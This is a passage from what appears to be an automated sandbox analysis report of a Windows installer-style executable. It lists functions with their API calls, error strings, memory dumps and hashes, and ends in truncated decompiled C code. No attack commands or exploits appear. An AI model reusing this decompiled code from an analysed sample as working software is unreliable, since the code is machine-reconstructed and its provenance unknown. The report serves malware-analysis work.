                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Open@16
                                                                                                                                                                  • String ID: Failed to format component id string.$Failed to format product code string.$Failed to get component path: %d$Failed to set variable.$MsiComponentSearch failed: ID '%ls', HRESULT 0x%x
                                                                                                                                                                  • API String ID: 3613110473-1671347822
                                                                                                                                                                  • Opcode ID: 97eb21ae87b07394502f361862f208d42290c0c90662757adb0954b46bf16f77
                                                                                                                                                                  • Instruction ID: 94f6557dc7af60e770a140882cdbaab5a4ce986d596003d913580933f64395f5
                                                                                                                                                                  • Opcode Fuzzy Hash: 97eb21ae87b07394502f361862f208d42290c0c90662757adb0954b46bf16f77
                                                                                                                                                                  • Instruction Fuzzy Hash: 40411432940616BACF31EA648C02BAFB279EF04314F25493BF106F12D1D77C9A609B9D
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00401364, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 127windowthreadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • PeekMessageW.USER32 ref: 00401389
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 0040138F
                                                                                                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040141D
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to start bootstrapper application., xrefs: 004013EB
                                                                                                                                                                  • Failed to load UX., xrefs: 004013D2
                                                                                                                                                                  • Failed to create engine for UX., xrefs: 004013A9
                                                                                                                                                                  • Unexpected return value from message pump., xrefs: 00401473
                                                                                                                                                                  • engine.cpp, xrefs: 00401469
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Message$CurrentPeekThread
                                                                                                                                                                  • String ID: Failed to create engine for UX.$Failed to load UX.$Failed to start bootstrapper application.$Unexpected return value from message pump.$engine.cpp
                                                                                                                                                                  • API String ID: 673430819-3216346975
                                                                                                                                                                  • Opcode ID: 500998441046e124dc745ce7867539d1f7e0171bf1cb8665652297a31edf6fee
                                                                                                                                                                  • Instruction ID: 10bdc6307b43d99e0e990679d0981ac5a8d9b5f8b5ca6828b0ea0f5cedf8d221
                                                                                                                                                                  • Opcode Fuzzy Hash: 500998441046e124dc745ce7867539d1f7e0171bf1cb8665652297a31edf6fee
                                                                                                                                                                  • Instruction Fuzzy Hash: E0418171A00215ABE714DBA5CC85FBAB7ACEF04314F10413BFA05F72A0DB78AD4187A9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040ED7F, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 114fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00401414,00000008,00000000,00000000,?,00000000,00000000,00401414,00000000,00000000,?,00000088,00000000,00000000,000000B8), ref: 0040EDAA
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040EDB7
                                                                                                                                                                  • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,00000000), ref: 0040EE58
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040EE62
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastRead
                                                                                                                                                                  • String ID: Failed to allocate data for message.$Failed to read data for message.$Failed to read message from pipe.$pipe.cpp
                                                                                                                                                                  • API String ID: 1948546556-3912962418
                                                                                                                                                                  • Opcode ID: 73c1f7f6f43ef6825a3a45e16fe96c0d3763171383f81196337dd2d49e0b5f08
                                                                                                                                                                  • Instruction ID: e40e032eb2169c3b91e6b48577fc0e41eb1a19033340dd249611fda1c2125b8c
                                                                                                                                                                  • Opcode Fuzzy Hash: 73c1f7f6f43ef6825a3a45e16fe96c0d3763171383f81196337dd2d49e0b5f08
                                                                                                                                                                  • Instruction Fuzzy Hash: 8831D872A40219BBEB209E66DC45BAFB7A8EF04751F10853BF905F61C0D778DD108AE8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00424B60, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 94synchronizationCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,7519F730,00000000,?,?,?,?,00424E6B,?), ref: 00424B79
                                                                                                                                                                  • ReleaseMutex.KERNEL32(?,?,?,?,00424E6B,?), ref: 00424B9C
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00424E6B,?), ref: 00424BDD
                                                                                                                                                                  • ReleaseMutex.KERNEL32(?,?,?,?,00424E6B,?), ref: 00424BF4
                                                                                                                                                                  • SetEvent.KERNEL32(?,?,?,?,00424E6B,?), ref: 00424BFD
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to send files in use message from netfx chainer., xrefs: 00424C43
                                                                                                                                                                  • kNB, xrefs: 00424BBD
                                                                                                                                                                  • Failed to get message from netfx chainer., xrefs: 00424C1E
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MutexObjectReleaseSingleWait$Event
                                                                                                                                                                  • String ID: Failed to get message from netfx chainer.$Failed to send files in use message from netfx chainer.$kNB
                                                                                                                                                                  • API String ID: 2608678126-2889711910
                                                                                                                                                                  • Opcode ID: c5d2b188b35dfb0fa1caeff8cc20bd548395c774f187a154cce503022672ce21
                                                                                                                                                                  • Instruction ID: c39abf65d642ce932a0e563b0a481fd3033edd47bb003eb3874dabe64fe91731
                                                                                                                                                                  • Opcode Fuzzy Hash: c5d2b188b35dfb0fa1caeff8cc20bd548395c774f187a154cce503022672ce21
                                                                                                                                                                  • Instruction Fuzzy Hash: BE310931A00619BFCB118F69DC09EEFBBB5EF44324F10866AF521E6260C775E9018B94
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040F8E4, Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 89synchronizationCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,0002BF20,?,F0000003,00000000,00000000,?,?,00000000,00000000,?,00000000,00000000,?,00000000), ref: 0040F98D
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,004018F4,?,?,00000000,?,?,?,00000000,?,?,?,?,?), ref: 0040F998
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to write exit code to message buffer., xrefs: 0040F908
                                                                                                                                                                  • Failed to post terminate message to child process cache thread., xrefs: 0040F95C
                                                                                                                                                                  • Failed to wait for child process exit., xrefs: 0040F9C6
                                                                                                                                                                  • Failed to write restart to message buffer., xrefs: 0040F925
                                                                                                                                                                  • pipe.cpp, xrefs: 0040F9BC
                                                                                                                                                                  • Failed to post terminate message to child process., xrefs: 0040F978
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLastObjectSingleWait
                                                                                                                                                                  • String ID: Failed to post terminate message to child process cache thread.$Failed to post terminate message to child process.$Failed to wait for child process exit.$Failed to write exit code to message buffer.$Failed to write restart to message buffer.$pipe.cpp
                                                                                                                                                                  • API String ID: 1211598281-2161881128
                                                                                                                                                                  • Opcode ID: af00691587e9ef0cd5c380e9d8912b6f4806d7d6a9d77df85a4cd04343f7aad4
                                                                                                                                                                  • Instruction ID: 35ae183228df456cc45d97db05c4db517aa346e58d09b7082b5658cde26c3d1e
                                                                                                                                                                  • Opcode Fuzzy Hash: af00691587e9ef0cd5c380e9d8912b6f4806d7d6a9d77df85a4cd04343f7aad4
                                                                                                                                                                  • Instruction Fuzzy Hash: F1212872900629BBDB215B65DC06F9E76A8EF04725F200237F901B25D0D738DE159ADD
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00412870, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 88fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNEL32(00000000,80000000,00000005,00000000,00000003,08000000,00000000,00000000,00000000,?,004137D2,00000003,000007D0,00000003,?,000007D0), ref: 0041288A
                                                                                                                                                                  • GetLastError.KERNEL32(?,004137D2,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,000000F9,00000001), ref: 00412897
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,004137D2,00000003,000007D0,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000,00000003,000007D0,000000F9), ref: 0041295E
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to verify hash of payload: %ls, xrefs: 00412949
                                                                                                                                                                  • Failed to verify signature of payload: %ls, xrefs: 00412906
                                                                                                                                                                  • Failed to verify catalog signature of payload: %ls, xrefs: 00412925
                                                                                                                                                                  • Failed to open payload at path: %ls, xrefs: 004128DA
                                                                                                                                                                  • cache.cpp, xrefs: 004128CD
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateErrorFileHandleLast
                                                                                                                                                                  • String ID: Failed to open payload at path: %ls$Failed to verify catalog signature of payload: %ls$Failed to verify hash of payload: %ls$Failed to verify signature of payload: %ls$cache.cpp
                                                                                                                                                                  • API String ID: 2528220319-2757871984
                                                                                                                                                                  • Opcode ID: 2df42585ac44cf955386a8a7a0a21404bf34be628eeec9a2b88f01fa5d5427f8
                                                                                                                                                                  • Instruction ID: 35ec180daca59b418a7cc5bb53b7c87e378de0777363988e95c5ff5aace304e1
                                                                                                                                                                  • Opcode Fuzzy Hash: 2df42585ac44cf955386a8a7a0a21404bf34be628eeec9a2b88f01fa5d5427f8
                                                                                                                                                                  • Instruction Fuzzy Hash: 1121F671710621B7DB222A699D45BEF7A55FF04724F104313FD00B52A093AD89B0DADC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040337E, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 85COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004033C9
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004033D3
                                                                                                                                                                  • GetVolumePathNameW.KERNEL32(?,?,00000104), ref: 00403417
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00403421
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$DirectoryNamePathVolumeWindows
                                                                                                                                                                  • String ID: Failed to get volume path name.$Failed to get windows directory.$Failed to set variant value.$variable.cpp
                                                                                                                                                                  • API String ID: 124030351-4026719079
                                                                                                                                                                  • Opcode ID: 72265ff09954956b56c5d4c2d6102bd299641ea16175b5e6aad15cf91b66e21a
                                                                                                                                                                  • Instruction ID: 0c7536d6d8ef7c7788e3db9a4c6d7f9c5d0b549be809dffff78e91d11574045c
                                                                                                                                                                  • Opcode Fuzzy Hash: 72265ff09954956b56c5d4c2d6102bd299641ea16175b5e6aad15cf91b66e21a
                                                                                                                                                                  • Instruction Fuzzy Hash: 6021B576E4022866DB20AA79AC05FDB76EC9F48715F11427BBD05F7181D7389D008AED
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00405CD5, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 85COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 00405CF0
                                                                                                                                                                  • GetFileAttributesW.KERNEL32(00000000,000002A8,?,00000000,00000000,000000F8,000000F8,00000000,000002D0,?,0040688D,000000F8,000000F8,000000F8,?,000000F8), ref: 00405D08
                                                                                                                                                                  • GetLastError.KERNEL32(?,0040688D,000000F8,000000F8,000000F8,?,000000F8,000000F8,000000F8,000002A8,000000F8), ref: 00405D13
                                                                                                                                                                  Strings
                                                                                                                                                                  • search.cpp, xrefs: 00405D45
                                                                                                                                                                  • Failed get to file attributes. '%ls', xrefs: 00405D52
                                                                                                                                                                  • File search: %ls, did not find path: %ls, xrefs: 00405D67
                                                                                                                                                                  • Failed to set variable., xrefs: 00405D98
                                                                                                                                                                  • Failed to format variable string., xrefs: 00405CFB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AttributesErrorFileLastOpen@16
                                                                                                                                                                  • String ID: Failed get to file attributes. '%ls'$Failed to format variable string.$Failed to set variable.$File search: %ls, did not find path: %ls$search.cpp
                                                                                                                                                                  • API String ID: 1811509786-2053429945
                                                                                                                                                                  • Opcode ID: 554180c7c558113d035d5f8f74b8aae5e81e503c2d7feb5be628f95ef0bdc85b
                                                                                                                                                                  • Instruction ID: 04c92a825a784e8b014ce0a1ff5a4e98947bb56fa085453003331f1cd54be0ca
                                                                                                                                                                  • Opcode Fuzzy Hash: 554180c7c558113d035d5f8f74b8aae5e81e503c2d7feb5be628f95ef0bdc85b
                                                                                                                                                                  • Instruction Fuzzy Hash: 0E210A32940620BBEF216A65AC4EFAF76A5DF44714F208127FD04F91D0E779CD009AA9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0041438B, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 63COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • TlsSetValue.KERNEL32(?,?), ref: 004143A2
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004143AC
                                                                                                                                                                  • CoInitializeEx.OLE32(00000000,00000000), ref: 004143EB
                                                                                                                                                                  • CoUninitialize.OLE32(?,004158CA,?,?), ref: 00414428
                                                                                                                                                                  Strings
                                                                                                                                                                  • elevation.cpp, xrefs: 004143D0
                                                                                                                                                                  • Failed to set elevated cache pipe into thread local storage for logging., xrefs: 004143DA
                                                                                                                                                                  • Failed to pump messages in child process., xrefs: 00414416
                                                                                                                                                                  • Failed to initialize COM., xrefs: 004143F7
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorInitializeLastUninitializeValue
                                                                                                                                                                  • String ID: Failed to initialize COM.$Failed to pump messages in child process.$Failed to set elevated cache pipe into thread local storage for logging.$elevation.cpp
                                                                                                                                                                  • API String ID: 876858697-113251691
                                                                                                                                                                  • Opcode ID: 080ef6d99993b48147500fa5b40c6b3598b58e80f9c0843c479e155703324004
                                                                                                                                                                  • Instruction ID: 67de8972aa042d51126ec1ec1ef6bf357e13e0fc8c4b195c3a20b205707e2442
                                                                                                                                                                  • Opcode Fuzzy Hash: 080ef6d99993b48147500fa5b40c6b3598b58e80f9c0843c479e155703324004
                                                                                                                                                                  • Instruction Fuzzy Hash: 35115C72A01634BB97215711AC05FCFBF98EF45761B114227FD00F3150D7289C4085ED
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040266A, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 53registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 004026F1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: +$CommonFilesDir$Failed to ensure path was backslash terminated.$Failed to open Windows folder key.$Failed to read folder path for '%ls'.$ProgramFilesDir$SOFTWARE\Microsoft\Windows\CurrentVersion
                                                                                                                                                                  • API String ID: 3535843008-3209209246
                                                                                                                                                                  • Opcode ID: d954b8cb5e38123cec9e09c0387a6ee3561277ec73dabefb1d013fc090d8f04e
                                                                                                                                                                  • Instruction ID: 6ba5ea62e0eecaf88160f002bab4ae3caba0e18111bfaa2c6bd7f1c4bcffeb1d
                                                                                                                                                                  • Opcode Fuzzy Hash: d954b8cb5e38123cec9e09c0387a6ee3561277ec73dabefb1d013fc090d8f04e
                                                                                                                                                                  • Instruction Fuzzy Hash: 8A01F932D40224B7CB126655AD07E9E7668DF68765F209137F800B61D0CBBD9E1096AC
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040E522, Relevance: 13.7, APIs: 1, Strings: 8, Instructions: 222sleepCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0040DFAE: RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,?,00000009,?,?,?,0040E53C,00000009,?,00000000,?,?,?,00401720), ref: 0040E04A
                                                                                                                                                                  • Sleep.KERNEL32(000007D0,?,00000000,Setup,00000000,log,0000000D,00000000,00000009,?,00000000,?,?,?,00401720,?), ref: 0040E5D1
                                                                                                                                                                    • Part of subcall function 0040E054: GetTempPathW.KERNEL32(00000104,?,?,00000000,0000000D), ref: 0040E0A8
                                                                                                                                                                    • Part of subcall function 0040E054: GetLastError.KERNEL32(?,00000000,0000000D), ref: 0040E0B2
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to get non-session specific TEMP folder., xrefs: 0040E67B
                                                                                                                                                                  • Failed to open log: %ls, xrefs: 0040E64D
                                                                                                                                                                  • log, xrefs: 0040E580
                                                                                                                                                                  • Failed to copy full log path to prefix., xrefs: 0040E72E
                                                                                                                                                                  • Failed to copy log extension to extension., xrefs: 0040E713
                                                                                                                                                                  • Failed to get current directory., xrefs: 0040E5BB
                                                                                                                                                                  • Setup, xrefs: 0040E586
                                                                                                                                                                  • Failed to copy log path to prefix., xrefs: 0040E6F3
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseErrorLastPathSleepTemp
                                                                                                                                                                  • String ID: Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log path to prefix.$Failed to get current directory.$Failed to get non-session specific TEMP folder.$Failed to open log: %ls$Setup$log
                                                                                                                                                                  • API String ID: 2857185464-2818506709
                                                                                                                                                                  • Opcode ID: 24b3a5dccada6b2f96b6bbff8f04a283539fbcc0e68479341c353c76a64632b4
                                                                                                                                                                  • Instruction ID: dd1a61693d7cb3461a8d22736f25847554aba28b593d99ae24de9ee36724c2e8
                                                                                                                                                                  • Opcode Fuzzy Hash: 24b3a5dccada6b2f96b6bbff8f04a283539fbcc0e68479341c353c76a64632b4
                                                                                                                                                                  • Instruction Fuzzy Hash: 0E61A271A00211BADB259B76CC41B6B76A8AF14344F144D7BF801EB2D0E7BDED6087A9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1002199A, Relevance: 13.6, APIs: 9, Instructions: 123COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                                                  			E1002199A(void* __ebx, void* __edx, void* __edi) {
				void* _t60;
				void* _t80;
				void* _t101;
				void* _t154;
				void* _t156;
				void* _t158;
				void* _t171;

				L0:
				while(1) {
					L0:
					_t150 = __edi;
					_t106 = __ebx;
					 *((intOrPtr*)(_t154 - 0xe2e0)) =  *((intOrPtr*)(_t154 - 0xe2e0)) + 1;
					_t60 = E10002270(_t154 - 0xe2a4);
					_t174 =  *((intOrPtr*)(_t154 - 0xe2e0)) - _t60;
					if( *((intOrPtr*)(_t154 - 0xe2e0)) >= _t60) {
						break;
					}
					L2:
					E1000CF80(__edi, _t154 - 0xab84, 0, 0x3710);
					E1000CF80(_t150, _t154 - 0x3d54, 0, 0x3710);
					_t80 = E10001A50(E100011E0(E100030B0(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), "=");
					_t151 = _t80 - E100011E0(E100030B0(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0))));
					E1000D1F0(__ebx, _t150, _t80 - E100011E0(E100030B0(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), _t154 - 0xab84, E100011E0(E100030B0(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), _t80 - E100011E0(E100030B0(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))));
					E1000D903( *((intOrPtr*)(_t154 - 0xe2e0)), _t154 - 0x3d54, 0x3710, E10001A50(E100011E0(E100030B0(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), "=") + 1);
					E1000CF80(_t150, _t154 - 0xe294, 0, 0x3710);
					E1000CF80(_t150, _t154 - 0x746c, 0, 0x3710);
					E1000CCA3(_t150, _t154 - 0xe294,  *((intOrPtr*)(_t154 - 0x3d58)), _t154 - 0xab84);
					_push(_t154 - 0x3d54);
					_push(_t154 - 0xe294);
					_push( *((intOrPtr*)(_t154 + 8)));
					E1000CCA3(_t150, _t154 - 0x746c,  *((intOrPtr*)(_t154 - 0x7470)),  *((intOrPtr*)(_t154 - 0x18)));
					_t171 = _t156 + 0x7c;
					if( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) != 0) {
						E1000D1F0(_t106, _t150, _t151,  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) +  *((intOrPtr*)(_t154 - 0x14)), _t154 - 0x746c, E1000CAD0(_t154 - 0x746c));
						_t171 = _t171 + 0x10;
					}
					_t101 = E1000CAD0(_t154 - 0x746c);
